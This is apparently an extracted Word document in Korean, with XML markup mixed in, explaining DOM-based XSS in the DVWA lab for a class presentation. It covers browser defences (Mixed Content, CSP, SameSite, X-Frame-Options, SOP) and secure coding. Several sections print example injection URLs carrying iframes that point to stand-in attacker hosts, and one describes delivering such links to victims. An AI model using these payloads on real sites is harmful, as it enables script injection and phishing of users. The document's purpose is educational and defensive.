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과거에는 DVWA 같은 환경에서 XSS 취약점을 증명할 때 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe src="http://해커서버..."&gt;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같은 페이로드를 삽입해 악성 스크립트를 실행하는 실습이 잘 통했지만,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현재는 브라우저의 HTTPS 보안 정책 때문에 이 공격이 브라우저 단에서 차단되는 경우가 많아 실습이 꼬이기 쉽기 때문입니다.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발표에 바로 활용하실 수 있도록 해당 이론을 깔끔하게 정리해 드립니다.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uc6naw2zswy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1. DOM-based XSS의 기본 원리 (도입부)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개념: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서버를 거치지 않고, 클라이언트(브라우저) 측의 자바스크립트가 사용자 입력값(URL 파라미터 등)을 안전하게 검증하지 않고 DOM(문서 객체 모델)에 반영할 때 발생하는 취약점입니다.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DVWA 예시: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DVWA의 DOM XSS 탭에서는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?default=English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같은 URL 파라미터 값을 JavaScript의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document.write()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등을 통해 화면에 그대로 출력합니다. 이때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default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값에 악성 스크립트나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&lt;iframe&gt;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태그를 삽입해 공격을 시도합니다.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l25n94nz9ok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2. XSS에서 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iframe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을 사용하는 이유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해커들은 XSS 공격을 할 때 단순히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alert(1)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을 띄우는 것이 아니라, 실질적인 피해를 주기 위해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&lt;iframe&gt;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태그를 자주 활용합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008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외부 악성 스크립트 로드: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길이 제한이 있는 입력 폼을 우회하여, 공격자 서버에 있는 크고 복잡한 악성 자바스크립트를 불러옵니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009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피싱(Phishing):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정상적인 페이지 위에 보이지 않는(또는 교묘하게 꾸민) iframe을 덮어씌워 사용자의 로그인 자격 증명을 탈취합니다.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9d4q5np3hci" w:id="2"/>
      <w:bookmarkEnd w:id="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3. 핵심: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iframe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과 HTTPS 충돌 이슈 (Mixed Content 정책)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이 부분이 교수님이 강조하신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발표의 메인 포인트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입니다.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최신 웹 환경에서는 타겟 사이트(DVWA)가 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS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로 서비스되고 있을 때, 공격자가 HTTP 환경의 해커 서버를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iframe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으로 불러오려 하면 브라우저가 이를 강제로 차단합니다. 이를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혼합된 콘텐츠(Mixed Content) 차단 정책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이라고 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D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Mixed Content(혼합된 콘텐츠)란?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E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안전한 암호화 통신(HTTPS)을 사용하는 웹 페이지 내에서, 암호화되지 않은 일반 통신(HTTP)을 통해 리소스(스크립트, 이미지, iframe 등)를 불러오는 것을 의미합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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브라우저의 차단(Active Mixed Content):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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단순 이미지(Passive)는 경고만 띄우고 보여주기도 하지만,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iframe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이나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&lt;script&gt;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처럼 페이지의 보안을 위협할 수 있는 '활성 콘텐츠(Active Content)'는 크롬, 엣지, 사파리 등 현대 브라우저에서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즉시 로드를 차단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합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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공격 실패 원인:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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DVWA가 HTTPS로 구동 중일 때, 사용자가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?default=&lt;iframe src="[http://attacker.com/malware.html](http://attacker.com/malware.html)"&gt;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형태의 페이로드를 넣으면 취약점 자체는 존재하지만, 브라우저 콘솔에 "Mixed Content Error"가 발생하며 공격이 무력화됩니다.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21h2acnnnnq" w:id="3"/>
      <w:bookmarkEnd w:id="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4. 추가로 언급하면 좋은 관련 보안 정책 (심화)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발표의 완성도를 높이기 위해 최신 브라우저들이 iframe을 통한 크로스 사이트(Cross-Site) 요청을 어떻게 추가로 방어하는지 덧붙이는 것을 추천합니다.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SameSite 쿠키 정책 (HTTPS 필수):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016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공격자가 iframe을 통해 사용자의 세션 쿠키를 탈취하려 할 때, 크롬 등의 브라우저는 기본적으로 타사 도메인 간 쿠키 전송을 막습니다(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SameSite=Lax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17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이를 우회하려면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SameSite=None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속성을 써야 하는데, 이 속성은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반드시 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure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 속성(즉, HTTPS 통신)과 함께 쓰일 때만 동작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합니다. 해커 서버가 HTTP라면 쿠키 탈취 시도 자체가 막힙니다.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X-Frame-Options (XFO) &amp; CSP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019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반대로 해커가 악성 사이트 내부에 타겟 사이트를 iframe으로 불러와 클릭재킹(Clickjacking)을 시도할 때, 타겟 사이트에서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X-Frame-Options: DENY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또는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Content-Security-Policy: frame-ancestors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헤더를 설정해 두면 iframe 렌더링 자체가 차단됩니다.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nuqzjihhqhq" w:id="4"/>
      <w:bookmarkEnd w:id="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1. DOM이란 정확히 무엇인가?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DOM(Document Object Model)은 쉽게 말해 브라우저가 HTML 문서를 이해하기 위해 만든 '구조도(트리)'입니다. 우리가 웹페이지를 볼 때, 자바스크립트는 이 DOM을 조작해서 화면의 글씨를 바꾸거나 팝업을 띄웁니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034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DOM XSS 취약점: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서버는 아무 잘못이 없는데, 클라이언트(브라우저)에서 돌아가는 자바스크립트가 사용자의 입력값(예: URL 파라미터)을 검증 없이 DOM에 그대로 욱여넣을 때 발생합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035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예시: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color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">document.write(URL의 텍스트)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라는 코드가 있을 때, 해커가 URL에 텍스트 대신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&lt;script&gt;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나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&lt;iframe&gt;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태그를 넣으면 브라우저가 이를 진짜 태그로 착각해 실행해 버리는 것이죠.</w:t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8ypp8huo0vv" w:id="5"/>
      <w:bookmarkEnd w:id="5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2. DOM과 iframe은 무슨 연관인가?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DOM XSS는 '취약점(문)'이고, iframe은 그 문을 통과해 공격을 수행하는 '무기(페이로드)'입니다.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해커가 DOM XSS 취약점을 발견했을 때, 긴 악성 코드를 URL에 직접 넣으면 길이가 잘리거나 의심받기 쉽습니다. 그래서 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe src="해커서버/malware.html"&gt;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라는 아주 짧은 코드만 취약한 DOM에 삽입합니다. 그러면 브라우저가 해커 서버의 화면이나 거대한 악성 스크립트를 사용자 화면에 몰래 띄우게 되죠.</w:t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8t0dt7pnld0" w:id="6"/>
      <w:bookmarkEnd w:id="6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3. 오해 바로잡기: 해커도 HTTPS를 쓰면 막히는가?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여기서 중요한 오해를 바로잡아야 합니다.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"해커가 본인의 악성 사이트에도 HTTPS를 적용하면 차단되어 사라진 기법인가?" — 아닙니다.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만약 타겟 사이트(DVWA)가 HTTPS이고, 해커도 HTTPS 인증서를 발급받아 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe src="https://해커서버..."&gt;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를 삽입한다면, 앞서 말씀드린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Mixed Content(혼합된 콘텐츠) 차단 정책은 통과합니다.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브라우저 입장에서는 "둘 다 안전한 통신이네?" 하고 일단 통과시켜 줍니다.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그럼에도 불구하고 이 공격이 최신 환경에서 잘 안 먹히고 '사라진 기법'처럼 치부되는 진짜 이유는, HTTPS 말고도 브라우저에 겹겹이 쳐진 다른 보안 방패들 때문입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D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진짜 차단 원인 1: CSP (Content Security Policy)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최신 웹사이트들은 서버에서 브라우저에게 "내 사이트에서는 내가 허락한 도메인(예: youtube.com)의 iframe만 열어!"라고 지시를 내립니다. 해커가 HTTPS를 쓰든 말든, 허락받지 않은 도메인이기 때문에 브라우저가 렌더링을 거부합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E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진짜 차단 원인 2: 쿠키 보안 정책 (SameSite)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iframe을 띄우는 목적이 세션(로그인) 쿠키를 훔치는 것인데, 최신 브라우저는 다른 도메인(해커 도메인)의 iframe 안에서 본래 사이트의 인증 쿠키에 접근하는 것을 원천 차단해 버립니다.</w:t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xn5i4xyv1zw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💡 요약: 교수님이 실습 대신 이론만 하라고 하신 진짜 이유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DVWA는 옛날 웹 환경을 가정하고 만든 실습 툴입니다. DVWA 코드를 보면 분명히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DOM XSS 취약점은 존재합니다.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(문은 열려 있습니다).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하지만 학생들이 최신 브라우저(크롬, 엣지 등)를 사용해 실습을 진행하면,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브라우저 자체가 너무 똑똑해져서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해커의 무기(HTTP에 의한 Mixed Content 에러, CSP 차단 등)를 꺼내는 족족 알아서 막아버립니다.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취약점은 있는데 브라우저 방어벽 때문에 공격이 실패하니, 학생들은 "어? 왜 실습대로 안 되지?" 하고 혼란에 빠지게 됩니다. 서버 옵션을 건드리고 브라우저 보안 설정을 다 꺼야만 간신히 실습이 되기 때문에, "실습 세팅하다가 시간 낭비하지 말고, 과거에 어떻게 공격이 성립했고 현대 브라우저(HTTPS, CSP 등)가 그걸 어떻게 막아내는지 그 '이론적 흐름'을 이해하라"는 것이 교수님의 깊은 뜻입니다.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2ny0k1e8jkt" w:id="8"/>
      <w:bookmarkEnd w:id="8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1. 스크립트는 도대체 '어디에' 삽입하는가?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DOM XSS(또는 반사형 XSS)에서 스크립트가 삽입되는 공간은 서버 DB나 파일이 아니라, 바로 '피해자에게 보낼 함정 링크(URL) 그 자체'입니다.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과정은 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C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함정 제작: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공격자는 취약한 DVWA 페이지의 URL 끝(파라미터 부분)에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iframe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코드를 달아 특수한 형태의 링크를 하나 만듭니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D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정상 링크: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[http://dvwa.com/vulnerabilities/domxss/?default=English](http://dvwa.com/vulnerabilities/domxss/?default=English)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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조작된 링크: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color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[http://dvwa.com/vulnerabilities/domxss/?default=](http://dvwa.com/vulnerabilities/domxss/?default=)&lt;iframe src="http://해커사이트"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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미끼 투척 (Delivery):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공격자는 이 조작된 링크를 이메일, 카카오톡, 게시판 등을 통해 피해자에게 보냅니다. (이때 링크를 짧게 줄이거나 교묘하게 숨깁니다.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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피해자 클릭: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피해자가 자기 PC에서 이 링크를 클릭합니다.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실행 (DOM 조작):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피해자의 브라우저가 DVWA 사이트에 접속합니다. DVWA에 있는 자바스크립트는 URL 파라미터(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default=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뒷부분)를 읽어와 화면에 뿌려주는 역할을 하는데, 검증 기능이 없으므로 악성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iframe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코드를 그대로 피해자 화면(DOM)에 그려버립니다.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결론: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공격자는 코드를 피해자 PC나 서버에 억지로 밀어 넣는 것이 아니라,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악성 코드가 포함된 URL 링크를 피해자가 스스로 클릭하게 유도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하는 것입니다.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ma2vbm0twnb" w:id="9"/>
      <w:bookmarkEnd w:id="9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1. 오해 교정: DNS는 통신 내용을 모릅니다 (DNS vs WAF)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질문에서 "DNS 서버에서 iframe이라는 단어를 파싱해서 차단한다"고 하셨는데, 여기에는 역할 혼동이 있습니다.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DNS 서버의 역할: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114 전화번호부와 같습니다. 사용자가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dvwa.com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을 입력하면 IP 주소(예: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192.168.0.10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)만 알려주고 끝납니다. URL 뒤에 붙은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?default=&lt;iframe...&gt;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같은 공격 코드는 DNS 서버를 거치지도 않고 볼 수도 없습니다.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단어 차단을 하는 곳 (WAF):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외부에서 들어오는 공격 코드를 파싱하고 차단하는 역할은 WAF(Web Application Firewall, 웹 방화벽)가 담당합니다. WAF에 "URL이나 입력값에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&lt;iframe&gt;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&lt;script&gt;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같은 단어가 들어오면 연결을 끊어버려라"라는 룰셋을 등록하는 것이 맞습니다.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7hsvbe00zc4" w:id="10"/>
      <w:bookmarkEnd w:id="1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2. CSP(Content Security Policy)의 진짜 작동 방식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CSP는 방화벽처럼 서버 입구에서 단어를 걸러내는 것이 아닙니다.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서버가 피해자의 '브라우저'에게 내리는 보안 지침서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입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B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작동 방식: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서버는 웹페이지를 응답할 때 HTTP 헤더에 CSP 룰을 적어 보냅니다. (예: </w:t>
      </w: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"우리 사이트에서는 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dvwa.com</w:t>
      </w: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 도메인에서 온 iframe이나 script만 실행해!"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5C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방어 효과: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피해자가 악성 링크를 눌러서 화면(DOM)에 해커의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&lt;iframe src="[http://hacker.com](http://hacker.com)"&gt;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코드가 삽입되더라도,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피해자의 브라우저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가 CSP 정책을 확인하고 "어? 서버가 hacker.com은 허락 안 했는데?" 하며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스스로 iframe 로딩을 차단해 버립니다.</w:t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e4op69dz6ar" w:id="11"/>
      <w:bookmarkEnd w:id="1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3. DOM XSS를 막는 가장 완벽한 대책: 시큐어 코딩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방화벽(WAF)에서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iframe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단어를 차단하는 것도 좋지만, 앞서 말씀드린 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#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(해시)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기호를 쓴 공격은 서버나 방화벽에 아예 도달하지 않고 브라우저에서만 처리된다고 했죠? 이 경우 방화벽은 무용지물이 됩니다.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따라서 DOM XSS를 막는 가장 근본적인 방법은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개발자가 자바스크립트 코드(프론트엔드)를 안전하게 짜는 것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입니다.</w:t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위험한 방식 (HTML로 해석함):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자바스크립트에서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innerHTML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이나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document.write()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함수를 쓰면, 들어온 값을 HTML 태그로 인식해서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iframe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을 렌더링해 버립니다.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안전한 방식 (단순 텍스트로 취급함):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innerText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나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textContent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함수를 쓰면, 해커가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&lt;iframe...&gt;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을 넣어도 화면에 글자 그대로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&lt;iframe...&gt;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이라는 문자가 출력될 뿐, 진짜 창이 뚫리지 않습니다.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f5vdri79m4p" w:id="12"/>
      <w:bookmarkEnd w:id="1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1. 해커의 가짜 도메인 접속 시 발생하는 일 (SOP의 방어)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해커가 만든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[http://dvwa.hacker.com/malicious.php](http://dvwa.hacker.com/malicious.php)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링크를 피해자가 클릭했다고 가정해 봅시다. 화면은 DVWA와 똑같이 생겼겠지만, 브라우저 주소창은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dvwa.hacker.com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을 가리키고 있습니다.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SOP (Same-Origin Policy, 동일 출처 정책):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브라우저는 철저하게 '도메인(Origin)'을 기준으로 데이터를 격리합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067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피해자가 이전에 진짜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dvwa.com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에 로그인해서 브라우저에 '진짜 세션 쿠키'가 저장되어 있더라도, 지금 접속한 곳은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hacker.com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이기 때문에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브라우저가 진짜 쿠키를 이 가짜 사이트의 자바스크립트에 절대 넘겨주지 않습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068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결론: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해커가 아무리 사이트를 똑같이 만들고 iframe을 떡칠해 놔도, 도메인 자체가 다르면 XSS의 주 목적인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'기존 로그인 세션(쿠키) 탈취'가 불가능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합니다. (물론 피해자가 속아서 아이디/비번을 새로 타이핑하게 만드는 '피싱'으로는 성공합니다.)</w:t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t9c2387nvvn" w:id="13"/>
      <w:bookmarkEnd w:id="1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2. 해커가 가짜 사이트 안에 "진짜 DVWA"를 iframe으로 띄운다면? (클릭재킹)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해커가 머리를 써서, 자신의 가짜 사이트(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dvwa.hacker.com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) 안에 투명한 iframe을 만들고, 그 iframe의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src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를 진짜 DVWA 사이트(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[http://real-dvwa.com](http://real-dvwa.com)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)로 연결해 둡니다. 피해자가 가짜 사이트의 '이벤트 당첨' 버튼을 누를 때, 실제로는 투명하게 겹쳐진 '진짜 사이트의 송금 버튼'이 눌리게 만드는 수법이죠.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이것을 클릭재킹(Clickjacking)이라고 부릅니다.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하지만 앞서 말씀하신 보안 정책(HTTP 헤더)이 여기서 진짜 힘을 발휘합니다.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방어 수단 (X-Frame-Options / CSP):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진짜 DVWA 서버 관리자가 서버 설정(Nginx, Apache 등)에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X-Frame-Options: DENY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또는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Content-Security-Policy: frame-ancestors 'none'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이라는 룰을 한 줄 넣어둡니다.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방어 결과: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피해자의 브라우저가 해커의 사이트를 열다가, 진짜 DVWA를 iframe으로 불러오려는 순간 저 헤더를 발견합니다. 브라우저는 "어? 진짜 DVWA 서버가 다른 사이트에서 자기를 iframe으로 띄우는 걸 금지했네?" 하고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iframe 안을 백지로 만들어 버립니다.</w:t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5ptuiyha3z" w:id="14"/>
      <w:bookmarkEnd w:id="1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3. 왜 해커들은 굳이 '진짜 도메인'에 코드를 욱여넣으려 (XSS) 하는가?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해커가 내 DNS를 파서 내 Nginx에 사이트를 올리면 너무나 쉽습니다. 하지만 앞서 말한 브라우저의 SOP 정책 때문에 '진짜 세션(권한)'을 훔칠 수가 없습니다.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그래서 해커들은 기를 쓰고 진짜 도메인(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dvwa.com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)의 URL 끝자락에 악성 스크립트를 삽입(DOM XSS)하려고 하는 것입니다. 진짜 도메인 주소창 위에서 스크립트가 실행되어야만, 브라우저가 안심하고 진짜 세션 쿠키를 내어주기 때문입니다.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xdunftpeeiz" w:id="15"/>
      <w:bookmarkEnd w:id="15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1. 차단의 주체는 서버가 아닌 브라우저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DOM XSS의 가장 큰 특징은 악성 코드가 서버에서 처리되는 것이 아니라는 점입니다. 해커가 보낸 URL 끝에 달린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&lt;iframe...&gt;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코드는 DVWA 서버가 아니라,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피해자의 PC에서 돌아가는 브라우저의 자바스크립트가 읽고 화면(DOM)에 그립니다.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따라서 그 iframe을 쳐내는(차단하는) 방패 역할도 방화벽이나 서버가 아니라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브라우저의 자체 보안 기능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이 담당합니다.</w:t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hgikpbll8gj" w:id="16"/>
      <w:bookmarkEnd w:id="16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2. 교수님이 원하시는 발표의 3단계 핵심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발표하실 때는 딱 이 세 가지 순서로 전개하시면 교수님의 출제 의도에 완벽하게 부합합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079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공격 시도 (DOM XSS 발생):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해커가 조작한 URL(DVWA 주소 + 악성 iframe 코드)을 피해자가 클릭합니다. DVWA의 취약한 프론트엔드 코드(자바스크립트)가 입력값을 검증 없이 화면에 그리려 시도합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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HTTPS 이슈 직면 (Mixed Content):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현재 DVWA 사이트가 암호화된 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS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로 서비스되고 있는데, 해커가 삽입한 iframe은 일반 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP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통신을 시도합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B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브라우저의 강제 차단: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피해자의 웹 브라우저가 "안전한 HTTPS 페이지에서 암호화되지 않은 HTTP 스크립트(활성 콘텐츠)를 실행할 수 없다"고 판단하여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Mixed Content(혼합된 콘텐츠) 차단 정책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을 발동합니다. iframe은 백지로 남고 공격은 무력화됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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yun33pze1ml" w:id="17"/>
      <w:bookmarkEnd w:id="17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3. 서버(DVWA)가 해야 하는 일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그렇다면 DVWA 서버는 아무것도 안 해도 될까요? 아닙니다. 서버가 직접 방어벽을 치는 것은 아니지만, 브라우저에게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보안 지시서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를 내려보내야 합니다. 서버는 응답을 보낼 때 HTTP 헤더에 CSP (Content-Security-Policy)를 설정하여, 브라우저에게 "우리 사이트는 외부 도메인의 iframe 로드를 절대 허용하지 않으니, 보이면 즉시 차단해"라고 룰을 정해줍니다.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md7my4uw77h" w:id="18"/>
      <w:bookmarkEnd w:id="18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1. 현실적인 걸림돌: 웹사이트는 생각보다 복잡하다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만약 우리 사이트가 오직 우리 DNS(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dvwa.com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) 안에서만 모든 것을 해결한다면 CSP 설정은 식은 죽 먹기입니다. 하지만 요즘 웹사이트들은 그렇지 않습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085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유튜브 영상 임베드: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youtube.com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에서 iframe을 불러와야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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결제 모듈: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외부 PG사(결제 대행사)의 iframe 창을 띄워야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087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기타 리소스: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구글 폰트, 카카오톡 공유하기 API, 광고 스크립트 등 수많은 외부 도메인이 얽혀 있습니다.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그래서 관리자는 우리 사이트가 쓰는 모든 외부 도메인을 일일이 파악해서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Content-Security-Policy: frame-src 'self' [https://www.youtube.com](https://www.youtube.com) [https://kakaopay.com](https://kakaopay.com);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처럼 일일이 허용 리스트를 작성해야 합니다. 만약 하나라도 빼먹으면 정상적인 기능이 작동하지 않아 서비스 장애가 터지기 때문에, 실무에서는 이 리스트를 고르는 작업에 꽤 공을 들입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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j0g1ddedl27" w:id="19"/>
      <w:bookmarkEnd w:id="19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2. CSP를 넣는 구체적인 방법 (Nginx / Apache 예시)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서버 관리자가 이 룰셋을 적용하는 방법은 생각보다 정말 간단합니다. 웹 서버 설정 파일에 헤더를 추가하라는 명령 한 줄만 넣으면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Nginx 설정 예시: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Nginx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# 우리 사이트('self')의 iframe만 허용하고, 나머지는 전면 차단하는 CSP 헤더 추가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add_header Content-Security-Policy "frame-src 'self';";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Apache 설정 예시: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Apache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# Apache 환경에서의 CSP 헤더 설정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Header set Content-Security-Policy "frame-src 'self';"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이렇게 설정해 두면 서버는 모든 사용자에게 웹페이지를 던질 때 이 지시서를 함께 보냅니다. 그러면 피해자가 해커가 보낸 함정 링크(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?default=&lt;iframe src="[http://hacker.com](http://hacker.com)"&gt;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)를 클릭해 브라우저가 화면을 그리려고 하다가도, 서버가 준 지시서를 보고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"어? hacker.com은 허용 리스트에 없네?"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하고 단칼에 차단해 버리는 것이죠.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